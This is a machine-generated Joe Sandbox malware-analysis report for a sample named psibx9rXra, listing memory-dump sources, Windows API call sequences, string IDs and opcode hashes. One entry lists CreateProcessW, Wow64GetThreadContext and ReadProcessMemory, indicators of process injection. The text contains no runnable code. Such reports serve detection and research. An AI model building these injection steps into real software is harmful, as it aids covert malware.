                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: cd684b83e9773d68d31b33b1148584a3054b547b0480d34e8faee6b2fd7d7e71
                                                • Instruction ID: 78426b1dadbfca817a62de6f7fc354b1c1ac1ecced9efbc76e67a789cca04d36
                                                • Opcode Fuzzy Hash: cd684b83e9773d68d31b33b1148584a3054b547b0480d34e8faee6b2fd7d7e71
                                                • Instruction Fuzzy Hash: A5D05E7954030EABDB709BA0EC0EF9A773CE704700F0042A1BAD495091EAB5A6989B91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db1824c8e226fdd0c9708a56f44f94235813c6a638219f9d9e549b5bfcdb90ae
                                                • Instruction ID: 06f0f22f9da7db909c25364b724fe99a61cd6ddaa8299955d74c87f2d13f7c64
                                                • Opcode Fuzzy Hash: db1824c8e226fdd0c9708a56f44f94235813c6a638219f9d9e549b5bfcdb90ae
                                                • Instruction Fuzzy Hash: 66F15971A083199FC714DF28C980A6ABBE5FF88314F14892DF9999B351D734E905DF82
                                                APIs
                                                  • Part of subcall function 00FA0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA0193
                                                  • Part of subcall function 00FA0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA019B
                                                  • Part of subcall function 00FA0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA01A6
                                                  • Part of subcall function 00FA0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA01B1
                                                  • Part of subcall function 00FA0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA01B9
                                                  • Part of subcall function 00FA0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA01C1
                                                  • Part of subcall function 00F960F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F8F930), ref: 00F96154
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F8F9CD
                                                • OleInitialize.OLE32(00000000), ref: 00F8FA4A
                                                • CloseHandle.KERNEL32(00000000), ref: 00FC45C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 1986988660-0
                                                • Opcode ID: 1f6e2c5f1530343beb074ef3324bc2b711168967caf71d63c13842e2dc07590d
                                                • Instruction ID: 5942fdb1a5d5eb80b02e13765e03cd8971abb72ace1ea0dd63f2df85941618dd
                                                • Opcode Fuzzy Hash: 1f6e2c5f1530343beb074ef3324bc2b711168967caf71d63c13842e2dc07590d
                                                • Instruction Fuzzy Hash: 8E81CEF8A016408FC3A4EF39EED56597BE5FB8831AB50812AD1D9CB259EB7E4404DF10
                                                APIs
                                                • _memset.LIBCMT ref: 00F84370
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F84415
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F84432
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$_memset
                                                • String ID:
                                                • API String ID: 1505330794-0
                                                • Opcode ID: 4c442dff1a5c04bbc31b213a9977ac96ca9d0ffb00213fe20e7b10e18d6cbbdf
                                                • Instruction ID: 892d575e847fe44229cf55e61f6bdf6f0a644dc5dfbdd26cc4439691d7db72f6
                                                • Opcode Fuzzy Hash: 4c442dff1a5c04bbc31b213a9977ac96ca9d0ffb00213fe20e7b10e18d6cbbdf
                                                • Instruction Fuzzy Hash: 42318FB09047028FD731EF24D9846DBBBF8FB49318F00092EF5DA82241E776A944EB52
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 00FA5733
                                                  • Part of subcall function 00FAA16B: __NMSG_WRITE.LIBCMT ref: 00FAA192
                                                  • Part of subcall function 00FAA16B: __NMSG_WRITE.LIBCMT ref: 00FAA19C
                                                • __NMSG_WRITE.LIBCMT ref: 00FA573A
                                                  • Part of subcall function 00FAA1C8: GetModuleFileNameW.KERNEL32(00000000,010433BA,00000104,?,00000001,00000000), ref: 00FAA25A
                                                  • Part of subcall function 00FAA1C8: ___crtMessageBoxW.LIBCMT ref: 00FAA308
                                                  • Part of subcall function 00FA309F: ___crtCorExitProcess.LIBCMT ref: 00FA30A5
                                                  • Part of subcall function 00FA309F: ExitProcess.KERNEL32 ref: 00FA30AE
                                                  • Part of subcall function 00FA8B28: __getptd_noexit.LIBCMT ref: 00FA8B28
                                                • RtlAllocateHeap.NTDLL(01900000,00000000,00000001,00000000,?,?,?,00FA0DD3,?), ref: 00FA575F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: f7e825b6eb91de4a4ffe064d43414db07d5e1658a158579311492d414980d618
                                                • Instruction ID: 4c0c14423adcf19df5d4b079469b486f8c600a6b929146bddead3c3fdfce44e5
                                                • Opcode Fuzzy Hash: f7e825b6eb91de4a4ffe064d43414db07d5e1658a158579311492d414980d618
                                                • Instruction Fuzzy Hash: E101F5FA600B16EBD6212734EC82B6E77589B83BB1F200025F505BA181DFB99C41B760
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FE9548,?,?,?,?,?,00000004), ref: 00FE98BB
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FE9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FE98D1
                                                • CloseHandle.KERNEL32(00000000,?,00FE9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE98D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                                                • Instruction ID: b6a2983661aea42d8e9c3dd22d8ddf991bac63e24f833af44d22814f14ee9075
                                                • Opcode Fuzzy Hash: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                                                • Instruction Fuzzy Hash: E3E08632140219B7D7321B54EC09FCA7B19AB06B70F108210FB54690D087B61611A7D8
                                                APIs
                                                • _free.LIBCMT ref: 00FE8D1B
                                                  • Part of subcall function 00FA2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA9A24), ref: 00FA2D69
                                                  • Part of subcall function 00FA2D55: GetLastError.KERNEL32(00000000,?,00FA9A24), ref: 00FA2D7B
                                                • _free.LIBCMT ref: 00FE8D2C
                                                • _free.LIBCMT ref: 00FE8D3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                • Instruction ID: fe8107c66a896e14df94673d03e04c9f112c8ec5332af984cfa1aed45d22aba1
                                                • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                • Instruction Fuzzy Hash: E0E017E1B0164146CB75B6BEAD40A9363EC4F993A2B140D1EB80DD7187CE68F883A128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                • Opcode ID: 43b4fab8f2987a6e38ec55c85fca6e262d991ddbdb8ee637d15f6f5f4c4f8d3b
                                                • Instruction ID: a26aa2d7320e9ab60211d4e769810ae307b1945c8acc461ba16c586917dd0cb8
                                                • Opcode Fuzzy Hash: 43b4fab8f2987a6e38ec55c85fca6e262d991ddbdb8ee637d15f6f5f4c4f8d3b
                                                • Instruction Fuzzy Hash: 46227D71908201CFDB24EF14C891BAAB7E1FF85314F14895EE8968B361DB35EC45EB82
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: EA06
                                                • API String ID: 4104443479-3962188686
                                                • Opcode ID: 691283d094394d616ee56e69d473199c11f2248baddb6e076e45427a327ed3e4
                                                • Instruction ID: 791bb0ba89221e684dc85eccbc6fd9348b82dda892b1b3b1bfc5ab62e1e2860d
                                                • Opcode Fuzzy Hash: 691283d094394d616ee56e69d473199c11f2248baddb6e076e45427a327ed3e4
                                                • Instruction Fuzzy Hash: DA415C63E0425A57CF21BB64CC917FE7FA69B46310F284475EC82DB282D628BD44B7A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                • Instruction ID: 15d71123632f555b77c9f710e6039fed70b5939cae06148e1b1f3f51189a232e
                                                • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                • Instruction Fuzzy Hash: 0B3187B2604606AFC704FF68D8D1FA9F3A5FF493207258629E519CB291EB34E950DB90
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00F84834
                                                  • Part of subcall function 00FA336C: __lock.LIBCMT ref: 00FA3372
                                                  • Part of subcall function 00FA336C: DecodePointer.KERNEL32(00000001,?,00F84849,00FD7C74), ref: 00FA337E
                                                  • Part of subcall function 00FA336C: EncodePointer.KERNEL32(?,?,00F84849,00FD7C74), ref: 00FA3389
                                                  • Part of subcall function 00F848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F84915
                                                  • Part of subcall function 00F848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F8492A
                                                  • Part of subcall function 00F83B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B68
                                                  • Part of subcall function 00F83B3A: IsDebuggerPresent.KERNEL32 ref: 00F83B7A
                                                  • Part of subcall function 00F83B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010452F8,010452E0,?,?), ref: 00F83BEB
                                                  • Part of subcall function 00F83B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C6F
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F84874
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                • Opcode ID: 8552137c7327ed103739f1882cfa283a4865ecbeb25b1a210976294ad08bffbf
                                                • Instruction ID: 21afed073327e56367321a0e8002139141fe786dcc2ce391706b908023f348d8
                                                • Opcode Fuzzy Hash: 8552137c7327ed103739f1882cfa283a4865ecbeb25b1a210976294ad08bffbf
                                                • Instruction Fuzzy Hash: D511A2B19083029FCB20EF68DD4595ABFE8FF8A750F10451FF085872A1DBBA9544DB92
                                                APIs
                                                  • Part of subcall function 00FA571C: __FF_MSGBANNER.LIBCMT ref: 00FA5733
                                                  • Part of subcall function 00FA571C: __NMSG_WRITE.LIBCMT ref: 00FA573A
                                                  • Part of subcall function 00FA571C: RtlAllocateHeap.NTDLL(01900000,00000000,00000001,00000000,?,?,?,00FA0DD3,?), ref: 00FA575F
                                                • std::exception::exception.LIBCMT ref: 00FA0DEC
                                                • __CxxThrowException@8.LIBCMT ref: 00FA0E01
                                                  • Part of subcall function 00FA859B: RaiseException.KERNEL32(?,?,?,01039E78,00000000,?,?,?,?,00FA0E06,?,01039E78,?,00000001), ref: 00FA85F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: dcfb48da133b1f9ee55b978eef0be58b97765b9e042a45a5e522152491484c40
                                                • Instruction ID: 9c3baa1ca924e4a3dfd9d292eb44449c1013419eefa2d1890cb7eb249e2cfdd2
                                                • Opcode Fuzzy Hash: dcfb48da133b1f9ee55b978eef0be58b97765b9e042a45a5e522152491484c40
                                                • Instruction Fuzzy Hash: 0FF0A4B690031E66CF14BAA4EC419DE77AC9F07365F100429FD44A6251DFB59A81B2D1
                                                APIs
                                                  • Part of subcall function 00FA8B28: __getptd_noexit.LIBCMT ref: 00FA8B28
                                                • __lock_file.LIBCMT ref: 00FA53EB
                                                  • Part of subcall function 00FA6C11: __lock.LIBCMT ref: 00FA6C34
                                                • __fclose_nolock.LIBCMT ref: 00FA53F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: f8e4b9f1988ddc8d6fa4c3cc4def6be881383804a1e97d3c8c611766e12ac290
                                                • Instruction ID: 7e9283ad56f07dacad88369c57978aa5b5c0de369e8709717516d2f2bcbc3cf8
                                                • Opcode Fuzzy Hash: f8e4b9f1988ddc8d6fa4c3cc4def6be881383804a1e97d3c8c611766e12ac290
                                                • Instruction Fuzzy Hash: ADF096F2D00B049ADF10AB659C057AE76E16F83BB5F248508E464AB1C1CBFC8942BB51
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01994D03
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01994D99
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01994DBB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                • Instruction ID: daf77d15661a9ee387e79d6d6602cbe241bef1fdf9721fc2b90bb349bdd07e29
                                                • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                • Instruction Fuzzy Hash: AA12CE24E14658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 4243a77ce9b2bb91b13c2ea648b55dbafb322af762c780521293e7a462768fe1
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 8C31C4B1A001059FC718DF58E484A69F7A6FF5A320B6487A5E80ACB355DB31EDD1EBC0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 9e34a2c4e3c7f89d0665d39225dec932c90b7449da9f221b1589d17dc419099d
